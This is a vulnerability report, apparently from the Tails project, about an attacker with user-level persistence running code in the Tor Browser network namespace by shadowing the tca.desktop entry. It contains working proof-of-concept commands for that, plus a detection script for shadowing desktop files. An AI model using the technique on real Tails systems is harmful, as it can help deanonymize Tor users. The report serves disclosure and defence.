attacker can execute code in tor-browser network namespace
See https://git.radicallyopensecurity.com/otf/pen-tails/-/issues/4
This attack applies if an attacker has amnesia-level privileges _and_ Tor is not bootstrapped.
## Summary
### Impact
The attacker can gain information about your Tor Browser circuits, which could be used to deanonymize the user.
Overall, this will be considered _Low_ in summit#191
### Availability
The attack is only available when the attacker has amnesia-level privileges _before_ the user connects to Tor. This requires a persistent attack (i.e., the attacker had amnesia-level privileges in the past and managed to persist in the Persistent Storage), so it has to be chained with other attacks.
It also requires user interaction ([citation needed](https://gitlab.tails.boum.org/tails/tails/-/issues/20733#note_252419)).
## Details
### Relevant code
In `/usr/local/lib/run-tor-browser`:
```sh
exec \
/bin/ip netns exec tbb \
sudo -u amnesia -- \
/usr/local/lib/run-with-env --env-file="${ENVFILE}" --delete -- \
/usr/local/lib/run-with-ibus-and-a11y-bus-proxy -- \
/usr/bin/tor-browser "$@"
```
In `/usr/bin/tor-browser`:
```sh
if tor_has_bootstrapped || ask_for_confirmation; then
    # Torbutton 1.5.1+ uses those environment variables
    export TOR_SOCKS_HOST='127.0.0.1'
    export TOR_SOCKS_PORT='9050'
    start_browser "${@}"
else
    gtk-launch tca.desktop
fi
```
### PoC
```sh
cp /usr/share/applications/tca.desktop /home/amnesia/.local/share/applications/
# Edit the file and change Exec= to anything you want e.g.
Exec=sh -c 'echo `id`'
# Trigger code exec
/usr/local/lib/run-tor-browser
# Example output; nogroup means we are inside the bwrap sandbox
amnesia@amnesia:~$ /usr/local/lib/run-tor-browser
uid=1000(amnesia) gid=1000(amnesia) groups=1000(amnesia),65534(nogroup)
```
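The PoC works because a desktop entry in the per-user applications directory takes precedence over the system entry of the same name when `gtk-launch` resolves `tca.desktop`. The following detection check is an added example, not part of the original issue or of the Tails code base: it reports per-user `.desktop` files that shadow a system entry and whether their `Exec=` lines differ. The function names, the two directory arguments and the sample files built by `demo` (including the placeholder `Exec=` values) are assumptions made for illustration.

```sh
#!/bin/sh
# Added example, not Tails code. Reports per-user .desktop files that
# shadow a system entry of the same name, and whether Exec= was changed.

# Print the Exec= lines of a desktop file, sorted for comparison.
exec_lines() {
    grep '^Exec=' "$1" 2>/dev/null | sort
}

# Usage: find_shadowed_entries USER_APPS_DIR SYSTEM_APPS_DIR
# Prints "<name><TAB><status>" per shadowing file; status is "modified"
# (Exec= differs from the system entry) or "identical".
find_shadowed_entries() {
    user_dir=$1
    system_dir=$2
    [ -d "$user_dir" ] || return 0
    for user_file in "$user_dir"/*.desktop; do
        [ -f "$user_file" ] || continue        # also covers an unmatched glob
        name=$(basename "$user_file")
        system_file="$system_dir/$name"
        [ -f "$system_file" ] || continue      # no system entry: not a shadow
        if [ "$(exec_lines "$user_file")" = "$(exec_lines "$system_file")" ]; then
            printf '%s\t%s\n' "$name" identical
        else
            printf '%s\t%s\n' "$name" modified
        fi
    done
}

# Constructed sample data (placeholder Exec= values, not the real entries):
# one tampered override, one untouched copy, one user-only entry.
demo() {
    tmp=$(mktemp -d) || return 1
    mkdir -p "$tmp/system" "$tmp/user"
    printf '[Desktop Entry]\nExec=/usr/bin/placeholder-tca\n' > "$tmp/system/tca.desktop"
    printf '[Desktop Entry]\nExec=/usr/bin/placeholder-other\n' > "$tmp/system/other.desktop"
    printf '[Desktop Entry]\nExec=sh -c placeholder\n' > "$tmp/user/tca.desktop"
    cp "$tmp/system/other.desktop" "$tmp/user/other.desktop"
    printf '[Desktop Entry]\nExec=/usr/bin/placeholder-own\n' > "$tmp/user/own.desktop"
    find_shadowed_entries "$tmp/user" "$tmp/system"
    rm -rf "$tmp"
}

# With two arguments, scan those directories; otherwise run the demo.
if [ "$#" -eq 2 ]; then
    find_shadowed_entries "$1" "$2"
else
    demo
fi
```

On a live system the arguments would be the two directories from the PoC: `/home/amnesia/.local/share/applications` and `/usr/share/applications`.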